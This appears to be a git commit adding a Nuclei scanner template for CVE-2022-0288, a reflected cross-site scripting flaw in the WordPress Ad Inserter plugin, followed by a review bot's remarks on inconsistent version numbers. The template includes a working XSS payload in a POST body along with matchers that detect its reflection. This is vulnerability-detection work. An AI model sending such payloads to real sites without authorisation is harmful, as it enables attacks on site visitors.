Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting (#4291)
* Create CVE-2022-0288.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io>patch-1
parent
e3bf8723e5
commit
6b4724f5b1
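--- a/CVE-2022-0288.yaml
+++ b/CVE-2022-0288.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-0288
+
+info:
+name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting
+author: DhiyaneshDK
+severity: medium
+description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+remediation: Fixed in version 2.7.12
+reference:
+- https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
+tags: cve,cve2022,wordpress,xss
+
+requests:
+- method: POST
+path:
+- "{{BaseURL}}"
+
+headers:
+Content-Type: "application/x-www-form-urlencoded"
+
+body: |
+html_element_selection=</script><img+src+onerror=alert(document.domain)>
+
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+part: body
+words:
+- "</script><img src onerror=alert(document.domain)>"
+- "ad-inserter"
+condition: and
+
+- type: word
+part: header
+words:
+- "text/html"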
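Review bot: The `remediation` line names 2.7.12 as the fixed version while `name` says releases below 2.7.10 are affected, so someone triaging a hit cannot tell which version to upgrade to. The description speaks of "the plugins" in the plural, so the two numbers presumably belong to different editions of the plugin; confirm this against the WPScan reference and name each edition with its fixed version in both `name` and `remediation`. The `info` block also has no `classification` section; adding one with `cve-id: CVE-2022-0288` and `cwe-id: CWE-79` would let scan results be filtered by weakness class. The page rendering has dropped the YAML indentation, so nesting could not be reviewed here.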